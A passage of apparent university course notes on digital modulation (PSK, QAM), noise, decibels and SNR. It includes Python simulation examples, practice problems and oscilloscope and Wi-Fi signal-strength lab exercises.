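def null_bandwidth(bits, bits_per_symbol, carrier_cycles=48):
    """Measured null bandwidth of the modulated signal, in units of Rb, next
    to the 2*Rb/N value the notes predict."""
    mag = dft_magnitude(modulate(symbol_waveform(bits, bits_per_symbol), carrier_cycles))
    # fs = 8*Rb and the window holds 8*len(bits) samples, so f = Rb is bin len(bits)
    bins_per_rb = len(bits)
    upper = first_null(mag, carrier_cycles, +1)
    lower = first_null(mag, carrier_cycles, -1)
    return (upper - lower) / bins_per_rb, 2.0 / bits_per_symbol


if __name__ == "__main__":
    base = dft_magnitude(symbol_waveform(BITS, 1))
    print("baseband pulses: first null at bin", first_null(base, 0, +1),
          "= Rb (bin", len(BITS), ")")
    for n in (1, 3):
        measured, predicted = null_bandwidth(BITS, n)
        print(f"{n} bit(s)/symbol: measured {measured:.3f} Rb, "
              f"predicted 2Rb/N = {predicted:.3f} Rb")
```

The measured null bandwidth comes out at exactly 2Rb for one bit per symbol and 2Rb/3 for three bits per symbol, matching the formula; the first nulls of the 3-bit waveform sit at fc ± Rb/3 instead of fc ± Rb, which is the “nulls closer to the carrier” effect shown in the QPSK spectrum figure.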
We could further increase to 4 bits/symbol using 16-PSK. Here, M = 16 and N = 4
bits/symbol. A 16-PSK constellation is shown to the right, where each phase is
separated by 360°/16 = 22.5°. More complex M-ary PSK modulation is possible: 16-PSK, 32-PSK, etc., but it becomes more susceptible to noise as the symbols get
closer together. As a reminder, for PSK, all of the symbols have the same carrier
frequency and amplitude; it is their phase that is different. For that reason, on a
constellation diagram, all of the symbols for PSK appear on a circle about the origin.
To demodulate any type of PSK, a receiver must determine the phase of the received symbol. For
16-PSK, the receiver must determine the phase within 11.25°, since the phases are separated by
22.5°. A portion of the constellation diagram for 16-PSK is shown to the right, indicating the wedge
of phase values that separates one of the symbols from the adjacent symbols.
Noise Effects
Recall that the number one most limiting factor in communication systems is noise. In all
transmissions, the received signal will be degraded by noise. The following figure shows a BPSK
signal and the same signal corrupted by noise. You might imagine that it is harder for a receiver to
determine the correct phase (correct symbol) that was transmitted for the noisy signal.
This noise corruption can be depicted in the constellation diagram to the
right, where the two transmitted BPSK symbols are indicated in the two
large black circles (phase = 0° and phase = 180°), and noisy received
symbols are the red and blue circles.
A BPSK receiver must make a decision to determine the phase of a
received signal to determine the corresponding bit. You may
imagine that if the noise is severe enough, a receiver might make a
mistake, and decide that it had received a 0-bit when it actually
received a 1-bit. These are called bit errors. Now, consider the
same noise in the presence of an 8-PSK signal. Is it easier for the
receiver to make bit errors?
Yes, as more phases are used in PSK, the symbols are closer
together, which makes it easier for the receiver to make bit errors
(see the figure to the right). But, of course, the advantage of more
symbols is a narrower bandwidth, if the bitrate is held constant.
There is a way to use more symbols in modulation while reducing
the chances of making bit errors; by using symbols that have
different amplitudes AND phases.
Quadrature Amplitude Modulation (QAM)
In order to increase the distance between symbols in the
constellation, another option is to modulate both the amplitude and
the phase. This is called Quadrature Amplitude Modulation (QAM)
8-QAM
An 8-QAM constellation is shown below (one of many possible 8-QAM constellations). The eight symbols along with the 3-bit digital words corresponding to each are shown to the right of the constellation. This system uses 2 possible amplitudes
and 4 possible phases. In 8-QAM, the duration of a symbol is three times the duration of a bit (since each symbol carries 3
bits). Note that there are both phase and amplitude changes for each symbol.
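Here is the noise argument of the last two sections as a small simulation, added to these notes as an example (it is not part of the original course material). It builds M-PSK constellations, computes the minimum distance between symbols, adds Gaussian noise to transmitted symbols and lets a nearest-symbol receiver decide, counting symbol errors. The 8-QAM used for comparison is an assumed rectangular 4-by-2 arrangement (two amplitudes), not necessarily the constellation in the notes’ figure; it is scaled to the same average symbol energy as the PSK constellations so that the comparison is at equal average transmit power. The noise level, symbol count and random seed are arbitrary choices for the demonstration.

```python
import cmath
import math
import random


def mpsk_constellation(m, first_phase_deg=0.0):
    """M symbols of equal amplitude spaced 360/M degrees apart
    (BPSK, QPSK, 8-PSK, 16-PSK ...). first_phase_deg=45 gives the notes'
    QPSK Constellation #2."""
    return [cmath.exp(1j * math.radians(first_phase_deg + 360.0 * k / m))
            for k in range(m)]


def normalize_energy(points):
    """Scale a constellation so its average symbol energy |s|^2 is 1, so
    that schemes are compared at the same average transmit power."""
    avg = sum(abs(p) ** 2 for p in points) / len(points)
    return [p / math.sqrt(avg) for p in points]


def rect_8qam():
    """Assumed 8-QAM: a 4x2 rectangle of points (two amplitudes). One common
    8-QAM layout, not necessarily the one in the notes' figure."""
    return normalize_energy([complex(i, q) for i in (-3, -1, 1, 3) for q in (-1, 1)])


def min_distance(points):
    """Smallest distance between any two symbols: the figure of merit for
    how much noise a receiver can tolerate."""
    return min(abs(a - b) for i, a in enumerate(points) for b in points[i + 1:])


def detect(received, points):
    """Receiver decision: the nearest constellation point. For PSK this is
    the same as picking the phase wedge the received phase falls into."""
    return min(range(len(points)), key=lambda k: abs(received - points[k]))


def symbol_error_rate(points, sigma, n_symbols=2000, seed=1):
    """Monte Carlo: send random symbols, add Gaussian noise of standard
    deviation sigma on each axis, count wrong decisions."""
    rng = random.Random(seed)
    errors = 0
    for _ in range(n_symbols):
        sent = rng.randrange(len(points))
        received = points[sent] + complex(rng.gauss(0.0, sigma), rng.gauss(0.0, sigma))
        if detect(received, points) != sent:
            errors += 1
    return errors / n_symbols


if __name__ == "__main__":
    sigma = 0.25  # noise level chosen for the demonstration
    schemes = [("BPSK", mpsk_constellation(2)), ("QPSK", mpsk_constellation(4, 45)),
               ("8-PSK", mpsk_constellation(8)), ("16-PSK", mpsk_constellation(16)),
               ("8-QAM", rect_8qam())]
    for name, pts in schemes:
        print(f"{name:6s} min distance {min_distance(pts):.3f}  "
              f"symbol error rate {symbol_error_rate(pts, sigma):.3f}")
```

With the same noise, the error rate climbs from BPSK to 8-PSK to 16-PSK as the minimum distance shrinks, and the rectangular 8-QAM has a larger minimum distance than 8-PSK at equal average power, which is the advantage described in the QAM section. One caveat: the QAM advantage shows up clearly only once the noise is low enough that the nearest neighbours dominate the error rate; at high noise the inner QAM points, which have more neighbours, make up for the extra distance, so the two 8-symbol schemes can trade places in a short simulation.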
What is the bandwidth for 8-QAM? The same as for 8-PSK, since the bandwidth for all digital modulation types (except for
FSK) is given by
BW = 2Rb / N
And it doesn’t stop there.
Higher level QAM signals
QAM signals can be extended to have a larger number of symbols, which gives a much higher bit rate for the same symbol
rate (because there are more bits per symbol). 64-QAM and 256-QAM are common in cable modems, satellites, and high-speed fixed
broadband wireless.
In 256-QAM, you find that for each symbol you are transmitting (there are 256 symbols), there are 8 bits of information.
Assuming the symbol rate remains constant, that means that for the same bandwidth, you are sending 8 times more
information when you use 256-QAM than when you use OOK, FSK, or BPSK. For 256-QAM, if the bitrate is 600 kbps, the
bandwidth is 2(600,000)/8 = 150 kHz.
Now that’s powerful!
Practice Problem 22.3
Using the signal constellation shown, answer the following questions.
[Figure: signal constellation with axes labeled 0˚, 90˚, 180˚ and 270˚]
a) What type of modulation does this represent?
b) How many symbols are represented (M)?
c) How many bits per symbol are used (N)?
d) If the Baud Rate is 10,000 symbols/second, what is the bit rate (Rb)?
e) Would 16-QAM be more or less susceptible to noise than this type of modulation?
Practice Problem 22.4
Label the modulation schemes.
(there are 2 symbols here)
(there are 4 symbols here)
Problems
1.
For an ASCII ‘Z,’ sketch both the On-Off Keying (OOK) binary waveform (voltage pulses) and the modulated signal,
where the amplitude of the carrier is modulated to either 10 V or 0 V and Tb = 100 ms. Hint: use the ASCII table from
Chapter 1 of the course notes to determine the bits that represent ‘Z’.
2.
Given this FSK transmission where individual symbols are denoted by vertical lines:
a. Draw the corresponding binary transmission (voltage pulses), assuming that the higher frequency represents a 1-bit:
b. Determine the bit rate.
c. How many bits per symbol could be conveyed if four different frequencies were used to transmit data instead of two (that is, if 4 symbols were used vice 2 symbols)?
3.
The following is a BPSK transmission. The dashed vertical lines separate the bits.
On this plot, a binary ‘1’ is represented by this signal:
a. Determine the transmitted bits.
b. Determine the bit rate.
c. What is the bandwidth for this transmission?
4.
QAM is a combination of which two types of modulation?
5.
The “forward” signal transmitted to control a remotely-controlled (RC) car is captured on an oscilloscope
and displayed below.
Answer the following questions with regards to this signal:
a. This modulation is binary, meaning that there are two possible symbols. What type of digital modulation is being used?
b. What is the bit rate? (Hint: Two time cursors are shown on the display as the two dashed vertical lines…these cursors isolate a single bit. Also shown are some measurements about the time cursors below the plot and to the
c. What bit sequence is represented by the O-scope display?
6.
16-QAM can be used for higher data rate transmissions.
a. How many bits are transmitted with each symbol?
b. If 4 different phases and 4 different amplitudes are used in a 16-QAM modulation system, sketch a constellation diagram that could be associated with the system (you do not need to label the bits for each symbol, just show the symbols).
c. If 8 different phases and 2 different amplitudes are used in a 16-QAM modulation system, sketch a constellation diagram that could be associated with the system (you do not need to label the bits for each symbol, just show the symbols).
d. If the bit rate associated with either of these 16-QAM systems was 1.2 Mbps, what is the bandwidth of the transmission?
7.
For a given bandwidth system, what is the advantage and disadvantage of using a multi-symbol encoding scheme (that
is, using more than 2 symbols)?
8.
A communication system transmits 100 kbps. For each of the following modulation types, determine the bandwidth of
the transmission.
a. FSK, with frequency deviation 200 kHz.
b. OOK.
c. QPSK.
d. 16-PSK.
e. 16-QAM.
f. 512-QAM.
9.
Suppose the FCC has leased you the portion of the frequency spectrum from 1.2 MHz to 1.3 MHz for your free-space
communication system. What is the maximum bitrate you could obtain if you used the following modulation schemes:
a. FSK, with fmark = 1.23 MHz and fspace = 1.27 MHz.
b. ASK.
c. BPSK.
d. 8-PSK.
e. 32-QAM.
f. 256-QAM.
Security Exercise 22
Digital Modulation: OOK and FSK
Discussion: A baseband signal is not compatible with free-space communication. Therefore, we need to modulate the binary
0s and 1s. Digital modulation is different from analog modulation in that the analog carrier signal is modulated by voltage
pulses that represent 0s and 1s.
Objective: To provide hands on experience and further familiarize each Midshipman with some of the aspects of the simplest
form of Amplitude Shift Keying (ASK), known as On Off Keying (OOK), as well as Frequency Shift Keying (FSK).
I. On-Off Keying (OOK)
In OOK, the amplitude of the digital signal controls the carrier signal, so that the carrier is turned on to represent a 1-bit and
turned off to represent a 0-bit.
Using your familiarity with the oscilloscope ( o-scope) and function generator from your previous labs, set up the Function
Generator with the following settings:
□ Press the Utility button and set your Output Setup to High Z.
□ Select the sinusoidal function by pressing the Sine button.
o Freq = 300 kHz (this will be the carrier frequency, fc)
o Ampl = 1 Vrms
□ Push Mod button with the following settings:
o TYPE = AM
o SOURCE = Int
o AM Depth = 100%
o AM Freq = 10 kHz (the modulating square wave is the 101010… bit pattern, so each period carries two bits and Rb = 20 kbps)
o SHAPE = Square
□ Connect the function generator Output (red to red, black to black) to CH 1 of the o-scope
□ Connect the function generator Sync (red to red) to CH2.
□ Push Output button to send the signal to the o-scope.
□ Push AUTOSET on the o-scope.
□ Adjust the o-scope with CH 2 on top (square wave) and CH 1 (carrier) on the bottom using the vertical positions on
CH1 and CH2.
□ Push the Trig Menu button on the o-scope and use the following settings:
o TYPE = Edge
o SOURCE = CH 2
o SLOPE = Rising
o MODE = Auto
o Coupling = AC
Note: You may need to adjust the Trigger level arrow to stabilize your display.
□ Push CH 1 MENU to return.
□ Adjust the horizontal range to 25 µsec per division.
□ Adjust CH 1 and CH 2 vertical scale (volts/div) so that you see a display similar to the Fig. 1 that follows.
Note: Your scope display should look similar to Figure 1, below, except your digital signal is a square wave, 101010…
Figure 1
Question 1: Looking at CH1 and using the time cursors, measure carrier period and then calculate the carrier
frequency, fc. Recall that the carrier is the rapidly changing sinusoid.
Question 2: Looking at CH2, measure the bit duration Tb, then calculate the bitrate, Rb.
□ Change the o-scope to display the frequency domain by choosing MATH MENU and using the following settings:
o OPERATION = FFT
o SOURCE = CH 1
o 50 kHz per Division
The o-scope should look similar to the Figure 2 below.
Figure 2
Question 3: Find the carrier frequency from the o-scope display (hint: use the frequency cursor).
□ Use the frequency cursors to measure the bandwidth (hint: the bandwidth is determined by the first null to the left
and right of the carrier).
Question 4: What is the bandwidth of the OOK signal (when fm = 10 kHz—that is, when Rb = 20 kbps)?
□ Change the AM Freq on the frequency generator to 20 kHz (so you are increasing your bit rate to 40 kbps).
□ Measure the bandwidth of the signal between the first pair of sidebands, as done in the previous step.
Question 5: Now, what is the bandwidth of the OOK signal (when fm = 20 kHz)?
Question 6: Based on Questions 4 and 5, as the bit rate increases, describe what happens to the bandwidth of the
signal. Remember that the equation for the bandwidth of an OOK signal is
BW = 2Rb / N.
Your findings should be supported by this equation!
II. Frequency Shift Keying (FSK)
Frequency shift keying (FSK) is another digital modulation technique in which a continuous sine wave changes frequency
when the digital bit stream changes between zero and one. The higher frequency represents a binary ‘1’ (also called mark)
and the lower frequency represents a binary ‘0’ (also called space). FSK is used primarily in low speed applications (<500
kbps) and noisy environments where accuracy is preferred over speed.
Keep the carrier frequency the same (fc is still 300 kHz), but change the modulation mode to FSK using the following steps:
□ Use the following modulation settings on the function generator (Mod):
o TYPE = FM
o SOURCE = Int
o FREQ DEV = 200 kHz (this is the frequency deviation, Δf).
o FM Freq = 10 kHz (the square wave is again the 101010… pattern, so Rb = 20 kbps).
o SHAPE = Square
□ Push CH 1 MENU on the o-scope to return to the time domain.
□ Set horizontal scale to 25 µs per division.
Note: Your display should look similar to Figure 3, below, where a 1-bit is represented by a sinusoid with a frequency
higher than the carrier’s (called the mark frequency) and a 0-bit with a frequency lower than the carrier’s (called the
space frequency).
Figure 3
□ Adjust the picture on the o-scope to answer the next question by changing the horizontal range setting (sec/div) and
using the time cursors to measure the periods of the two sinusoids.
Question 7: What is the mark frequency, fmark? What is the space frequency, fspace?
□ To see the difference in the bandwidth for the FSK signal, shift to the frequency domain. Push the MATH MENU
button and use the following settings:
o OPERATION = FFT
o SOURCE = CH 1
o 125 kHz per Division
□ Measure the bandwidth between the sidebands (approximately) as shown in Figure 4. This is based on the first peak
to the left of fspace and the first peak on the right of fmark.
Figure 4
Question 8: What is the measured bandwidth? (Hint: your answer should be much larger than your answer for the OOK bandwidth.) Remember that the equation for the bandwidth of an FSK signal is
BW = (fmark + Rb) - (fspace - Rb) = fmark - fspace + 2Rb
or
BW = 2(Δf + Rb)
Your answer should be supported by this equation!
□ Change the FM FREQ to 20 kHz (now Rb = 40 kbps) and measure the bandwidth of the signal as shown in Fig. 4.
Question 9: What is the new bandwidth?
Question 10: Based on the above change, as the bit rate (Rb) increases, describe what happens to the bandwidth of
the signal. What can you say about the comparisons of the bandwidths for FSK as compared to OOK?
□ Turn off your equipment and clean up your lab bench.
Security Exercise 22 Answer Sheet
Name:
_________________________________________________________________________________________________
Question 1:
_________________________________________________________________________________________________
Question 2:
________________________________________________________________________________________________
Question 3:
________________________________________________________________________________________________
Question 4:
_________________________________________________________________________________________________
Question 5:
_________________________________________________________________________________________________
Question 6:
_________________________________________________________________________________________________
Question 7:
_________________________________________________________________________________________________
Question 8:
_________________________________________________________________________________________________
Question 9:
_________________________________________________________________________________________________
Question 10:
_________________________________________________________________________________________________
Chapter 23: Power Gain and SNR
Objectives:
(m) Define gain and attenuation and describe their application to communications.
(n) Calculate power gains for single and multiple stage systems; determine power at each stage.
(o) Express power gain in dB, and power levels in dBW and dBm. Compute power gain and power from dB, dBW and dBm.
(p) Calculate signal to noise ratio (SNR) and discuss the impact of noise in a communication system.
Connection to Cyber Security
Communication systems transmit electrical (EM) signals to convey information. The strength of a signal is based on its electrical power, and the transmit power is an important consideration in how far a signal can be transmitted through the atmosphere. In addition, the received power is an important factor in how accurately an information signal can be recovered; if the received power is not high enough to overcome the noise present, then information will be lost. Cyber security attacks against wireless communication systems can take advantage of the frequencies and modulation types of the transmission (Chapter 22), but also of the power that is received by a receiver. These attacks take the form of jamming, and possibly of taking control of devices that are controlled via a wireless communication link, if the received control signals from the actual transmitter are weaker than the received power from a hacker's signal. In 2011, Iran captured a US unmanned aerial vehicle (UAV) while in flight, claiming that their cyberwarfare unit had commandeered and safely landed the UAV. This chapter introduces the power aspects of wireless communication.
1. Gain/Attenuation.
Electrical power is measured in Watts (W); your typical flat screen TV uses maybe 250 W while it is on, and your laptop may use 60 W while it is running heavy-duty programs. In wireless communications, it may take an incredibly large transmit power to cover the distance to the receiver, and even then, the power arriving at the receiver may be incredibly small. For example, a commercial FM station may transmit 15.5 kW of signal power to reach your car's radio, and by the time it gets to your car's antenna, the received power may be on the order of 1 pW (10^-12 W). This means that the transmitted power has dropped by a factor of approximately 10^16. Consider a satellite ground station (on Earth), transmitting to another ground station on the other side of the Earth via a geostationary satellite, 22,300 miles away. This is an immense distance to transmit over to reach the satellite! How about NASA's New Horizons space probe mission, currently on its way to the planet Pluto: it will be transmitting information back to Earth nearly 4 billion miles away!
So how are you going to get your signal to travel further? Turn up the power. But modulators that produce PSK or QAM
typically do not produce signals of substantial power; instead we use devices called amplifiers to increase the power of the
modulated signals (that is, to amplify them) so that they are strong enough to cover the required distances.
The term power gain refers to the factor by which the power of a signal is increased as it goes through an amplifier. The power gain (AP) is the ratio of the output signal power to the input signal power. In a block diagram of a communication system, an amplifier is typically drawn as a triangle (although rectangular blocks are also used), as in the following figure. To calculate power gain (AP) where Pin is the power input and Pout is the power output, we use the equation:
AP = Pout / Pin .
An amplifier can take a modulated signal and increase its power large enough to transmit many miles, much like the above
example of a FM radio broadcasting tower transmitting at 15.5 kW.
There are, however, some components of communication systems that reduce the power of a signal. Reduction of the power of a signal (signal loss) is termed attenuation. Attenuation is still computed using the equation for power gain, but a component that attenuates has a power gain that is less than 1.0.
Putting together what we’ve learned, we have our modulated signal feeding into an amplifier that increases the power of the
signal. The signal is broadcast out of the transmitter via an antenna, where the signal is attenuated as it travels through the air
to the receiver’s antenna. Finally the significantly reduced signal is picked up by the receiver, and the receiver recovers the
information. This is depicted in the following diagram for an ASK system.
Practice Problem 23.1
The input power of an amplifier is 6 W. The power gain is AP = 80. What is the output power?
Practice Problem 23.2
The input power is 15.5 kW. The power output is 10^-15 W. Is this system associated with amplification or attenuation? What is the gain (or attenuation) of this system?
You may have noticed that there can be a large disparity in the power values between transmitter and receiver, and dealing
with incredibly large and incredibly small values in the same system is challenging. For this reason, in many cases we deal
with decibel values instead of the numeric values.
2. Decibels.
As engineers, we just want our lives to be as easy as possible. So rather than work with these terribly tedious numbers, we
often convert the numbers into decibels (dB). The decibel is a logarithmic measure that provides more convenient gain and
attenuation values by changing them to a logarithmic scale. The benefit of a log scale is that it can map a very large range of
decimal values into a small range of decibel values. Consequently, small changes in decibel quantities may mean very large
changes in power (we’ll revisit this in the accompanying security exercise). To convert a decimal value X into decibel value
XdB is given by:
XdB = 10 log10 (X) .
If X is a value greater than 1.0, then XdB will be a positive value, and if X is a value less than 1.0, XdB will be a negative value. The decibel value of X = 0 is negative infinity, and the decibel is undefined for negative values of X.
For power gain (or attenuation) then:
AP,dB = 10 log10(AP) = 10 log10(Pout / Pin) .
So then for the above practice problem that gave us a headache, we see:
AP,dB = 10 log10(Pout / Pin) = 10 log10(0.000000000000001 W / 15,500 W) = 10 log10(6.45 x 10^-20) = -191.9 dB
Practice Problem 23.3
Convert these two power gains to decibels (dB).
AP =1000
AP =0.0001
A couple of very common values of power gain are 2 and ½. A power amplification by a factor of two (AP = 2) will result in a
power gain of +3 dB.
AP,dB = 10log10 (AP ) = 10log10 (2) = +3 dB
An attenuation by a factor of one-half will result in a power gain of -3 dB.
AP,dB = 10log10 (AP ) = 10log10 (0.5) = -3 dB
How do you find the decimal value corresponding to a decibel value? Just rearrange the dB equation from earlier and you get:
AP,dB = 10 log10(AP), so AP = 10^(AP,dB / 10) .
Practice Problem 23.4
Convert the following power gains from decibels to decimal gains.
AP,dB = 25 dB: AP =
AP,dB = -6 dB: AP =
Power gain is a ratio of two powers, Pin and Pout, each with a unit of power, usually W or mW. When taking this ratio, the
units of power cancel, and you’re taking the log of a unitless ratio. Logarithms only work with numbers, not units. In
communications, we are sometimes asked to compute the decibel value of a power level (in W or mW). In this case, you will
take the log of that power level with respect to a fixed reference power level, either 1 W or 1 mW so that the units cancel and
you’re just taking the log of a number.
dBm: The number of decibels of power relative to 1 mW. The reference power level is 1 mW and the dBm value is expressed mathematically as
PdBm = 10 log10(P(in mW) / 1 mW)   or   PdBm = 10 log10(P(in W) / 0.001 W) .
If the power value to compute is already in mW, the first equation can be used, and if the power value is in W, then the second equation can be used. In this case, since 1 mW = 0.001 W, the units will cancel.
dBW: The number of decibels of power relative to 1 W. The reference power level is 1 W and the dBW value is expressed mathematically as
PdBW = 10 log10(P(in W) / 1 W) .
In all cases, the units of power must cancel so that the resulting ratio is unitless.
Also, if given a dBm or dBW value, the power in mW or W can be found from:
P(in mW) = 10^(PdBm / 10)   or   P(in W) = 10^(PdBW / 10) .
Practice Problem 23.5
Express Pin = 2 W in decibels as both dBm and dBW.
Pin,dBm =
Pin,dBW =
Practice Problem 23.6
Express 25 dBm in terms of mW and W.
P(in mW) =
P(in W) =
Besides compressing a large range of values into a smaller range of decibel values, another benefit from using decibels is the
mathematics involved in combining decibel terms; decibel values are added or subtracted instead of multiplying or dividing.
This is typically seen in communication systems that cascade amplifiers as in the following figure. Here, the output power
after each amplifier is computed as the product of the power into that amplifier and its power gain.
So, if we leave the gains in ratio form, then the total gain of the system will be the product of all the gains multiplied together,
and we could rewrite this cascade of three amplifiers as a single amplifier with power gain AT.
In terms of decibels, the overall decibel gain of a cascade of amplifiers can be found as follows:
AT,dB = 10 log10(AT) = 10 log10(AP1 × AP2 × AP3) .
Using the property of the log function that the log of a product is the sum of the logs, we have:
AT,dB = 10 log10(AP1 × AP2 × AP3)
      = 10 log10(AP1) + 10 log10(AP2) + 10 log10(AP3)
      = AP1,dB + AP2,dB + AP3,dB
Also, we could use the property of the log function that the log of a quotient is the difference of the logs to write the
following equation:
.
In this equation, the input and output powers must be in the same decibel units, either dBW or dBm. Note that the difference
between two dBm or dBW values will result in a dB value. Applying the log of products property to a cascaded system of
amplifiers,
Pout,dBm = 10 log10(Pin × AP1 × AP2 × AP3)
         = 10 log10(Pin) + 10 log10(AP1) + 10 log10(AP2) + 10 log10(AP3)
         = Pin,dBm + AP1,dB + AP2,dB + AP3,dB .
Here, it is okay that dB and dBm are mixed on the right side of the equation, because all of the decibel values represent
unitless numbers; it’s just that the input and output power values’ decibel values must be computed relative to 1 mW. If the
input and output powers are in W instead of mW,
Pout ,dBW = Pin,dBW + AP1,dB + AP2,dB + AP3,dB .
Adding and subtracting decibels is a much simpler operation than multiplying and dividing very large or very small decimal numbers. A common mistake midshipmen make is to multiply or divide decibel values: NEVER, EVER do that. Decibels are always added to or subtracted from other decibels.
Practice Problem 23.7
The diagram below represents the first three stages of a typical AM or FM receiver. Find the following quantities.
(a) AT and AT,dB
(b) AP1,dB, AP2,dB, and AP3,dB.
(c) P1, P2, and Pout.
(d) Pin,dBm, P1,dBm, P2,dBm, and Pout,dBm.
3. Noise and the Signal-to-Noise Ratio (SNR)
Recall from Chapter 19 that noise is one of the principal limiting factors in the performance of communication systems, and that noise is added to our signal from external sources in the communication channel and also from internal (electronic) sources within our own system's hardware.
As we saw in Chapter 22, if the noise is significant enough, it can mask the original signal such that the signal becomes unrecoverable, or, in the case of digital modulation, bit errors can occur. This noise effect is not much different from an enemy flooding the airwaves with an erroneous signal on the same frequency on which you are transmitting. If that erroneous signal is stronger at the receiver than your signal, your signal becomes unrecoverable.
How do we know the effect of noise on the signal, or the quality of the received signal in the face of noise? We use the
signal-to-noise ratio (S/N, also referred to as SNR), which is the ratio of the power of a signal to the power of the noise
corrupting that signal. A strong signal in weak noise results in a high SNR. A weak signal in strong noise results in a low
SNR. Below are four samples of a sine wave with various amounts of noise added.
The signal-to-noise ratio indicates the relative strengths of the signal and the noise in a communication system. The stronger
the signal and the weaker the noise, the higher the SNR. Mathematically, SNR is defined as:
SNR = Ps / Pn   and   SNRdB = 10 log10(Ps / Pn) .
Practice Problem 23.8
The signal power at the input to a receiver is 6.2 nW and the noise power at the input to that receiver is 1.8 nW. Find SNR and
SNRdB.
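The decibel, cascade, SNR and sensitivity arithmetic of this chapter, collected into reusable functions as an added example (this is not code from the EC310 notes). The function names are my own; the numbers exercised at the bottom are the chapter's own (the 15.5 kW to 10^-15 W example, Problem 8's five stages, Problem 10's -45 dBm sensitivity). The last function makes the chapter's jamming point concrete: the attacker wins when the jammer's power at the receiver exceeds the legitimate signal's, which in dBm is just a subtraction.

```python
"""Link-budget helpers for Chapter 23 (added example; not from the EC310 notes).

Power ratios <-> dB, absolute power <-> dBm/dBW, cascaded stages, SNR, and two
checks a wireless attacker cares about: does the received signal clear the
receiver's sensitivity, and does a jammer arrive stronger than the real signal?
"""
import math


def to_db(ratio):
    """Power ratio -> dB. A ratio of 0 would be -inf and a negative ratio is
    undefined, so both are rejected instead of silently producing garbage."""
    if ratio <= 0:
        raise ValueError("power ratio must be positive: %r" % ratio)
    return 10 * math.log10(ratio)


def from_db(db):
    """dB -> power ratio (inverse of to_db)."""
    return 10 ** (db / 10)


def watts_to_dbm(p_w):
    """Absolute power in W -> dBm (reference 1 mW = 0.001 W)."""
    return to_db(p_w / 1e-3)


def dbm_to_watts(p_dbm):
    return 1e-3 * from_db(p_dbm)


def watts_to_dbw(p_w):
    """Absolute power in W -> dBW (reference 1 W)."""
    return to_db(p_w / 1.0)


def cascade_gain_db(stage_gains_db):
    """Overall gain of cascaded stages: in dB the stage gains ADD (never multiply dB)."""
    return sum(stage_gains_db)


def cascade_powers_w(p_in_w, stage_gains):
    """Power leaving each stage for LINEAR gains (ratios), which multiply.
    Returns [P1, P2, ..., Pout]."""
    powers, p = [], p_in_w
    for g in stage_gains:
        p *= g
        powers.append(p)
    return powers


def output_dbm(p_in_dbm, stage_gains_db):
    """Pout,dBm = Pin,dBm + sum of the stage gains in dB."""
    return p_in_dbm + cascade_gain_db(stage_gains_db)


def snr_db(p_signal_w, p_noise_w):
    """Signal-to-noise ratio in dB from signal and noise powers in the same units."""
    return to_db(p_signal_w / p_noise_w)


def receiver_can_recover(p_rx_dbm, sensitivity_dbm):
    """True when the received power meets the receiver's minimum usable level."""
    return p_rx_dbm >= sensitivity_dbm


def jammer_margin_db(p_legit_dbm, p_jammer_dbm):
    """Jammer-to-signal margin at the receiver, in dB. Positive means the attacker's
    transmission is the stronger one and the legitimate signal is masked."""
    return p_jammer_dbm - p_legit_dbm


if __name__ == "__main__":
    # Text example: 15.5 kW transmitted, 1e-15 W received
    print("%.1f dB" % to_db(1e-15 / 15.5e3))
    # Problem 8: five stages in dB, 1 dBm in
    stages = [12, -45, 68, -31, 9]
    print("overall %d dB, out %d dBm" % (cascade_gain_db(stages), output_dbm(1, stages)))
    # Problem 10: is 10 uW enough for a -45 dBm receiver?
    print(receiver_can_recover(watts_to_dbm(10e-6), -45))
    # Jamming: legitimate control link at -70 dBm, attacker at -60 dBm
    print("jammer margin: %d dB" % jammer_margin_db(-70, -60))
```

Keeping linear gains and dB gains in separate functions is deliberate: the chapter's "never multiply decibels" rule becomes a type distinction in the code, and mixing the two is the most common bug in hand-rolled link budgets.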
Problems
1. Convert power gains of 100, 1000 and 2000 to decibel values.
2. Convert power gains of 0.01, 0.001, and 0.0005 to decibel values.
3. Convert decibel power gains of 13 dB, 33 dB, and 103 dB to power gains.
4. Three amplifiers with gains of 12.5, 4, and 20 are cascaded as shown in the following diagram (from left to right). The input power is 120 mW. What is the overall gain and the output power of each stage?
5. A power amplifier has an output power of 200 W and an input power of 8 W. What is the power gain in decibels?
6. A power amplifier has a gain of 55 dB. The input power is 600 mW. What is the output power in W?
7. An amplifier has an output power of 5 W. What is this amount of power in dBm?
8. A communication system has five stages, with gains and attenuations of 12 dB, -45 dB, 68 dB, -31 dB and 9 dB.
   a. What is the overall gain in dB (AT,dB)?
   b. The overall power gain (AT)?
   c. If the input power is 1 dBm, what is the output power in dBm?
9. The signal input power to a receiver is 6 W. The noise power is 25 mW. What is the SNR? What is SNRdB?
10. A receiver's sensitivity is the minimum received signal power for the receiver to successfully recover the transmitted signal. If a receiver's sensitivity is -45 dBm, and the received power is 10 μW, will the receiver be able to recover the transmitted signal?
Security Exercise 23
Introduction to Wireless Signals
Discussion: In the wireless section of the course so far, you have learned that we transmit information using EM waves in
free space. If we encode some meaningful data onto these waves, we can communicate without being physically tethered to
the medium. But how far away can we be? How close to the transmitter must we be in order to receive the message and
successfully recover the information?
Just like our human voice only travels so far when we shout, radio waves only travel so far from the transmitting station. At
some point, you will just be out of range.
Fortunately, we can measure the strength of the transmitter (how loud it can “shout”) and the sensitivity of a receiver (how quiet a sound it can still “hear”). When we put these measurements on a logarithmic decibel scale and compare them, we can figure out things like:
What is the optimal location for a transmitter?
Where is the best spot to get reception?
Which devices receive a better signal?
These are things you probably do with your cell phone all the time. Today we will do an experiment and see if we can
answer these questions scientifically.
Objective: To provide hands on experience and further familiarize each Midshipman with power measurements in a wireless
communication system, and the effects of distance from the transmitter to the receiver.
Set-up.
Equipment required:
Your issued Laptop
Xirrus software:
I. Measuring Signal Strength from your Local WiFi
□ On your laptop, check the wireless connections and you should see a list of devices. One of the devices is the wireless Access Point (AP) in your classroom named cyber2_xx. The xx is your room number. If you do not see the specific AP for your room, tell your instructor.
□ Once you see your cyber2 AP, start Xirrus Wi-Fi Inspector by double clicking the icon on your desktop. Let's explore the Xirrus Graphical User Interface (GUI) shown in the next figure. You should identify each of the following parts on the display (identified with letters a-e) and then perform any specific instructions on your laptop.
a) Start by clicking on settings and turning “Locate Sound” to Off. Click OK.
b) In the upper left is the “Radar Display.” This shows the relative signal strength of an AP. The stronger the AP,
the closer it is to the middle of the display. It doesn’t correlate with specific direction of the AP relative to you,
but it will converge to the center as strength increases.
c) In the center top is “Connections” which lists the details of the AP you are connected to.
d) Below that is “Networks” which lists of all the AP’s you can observe with their respective data.
e) “Signal History” is a time versus signal strength (in dBm) graph of the AP you are trying to locate. Highlight
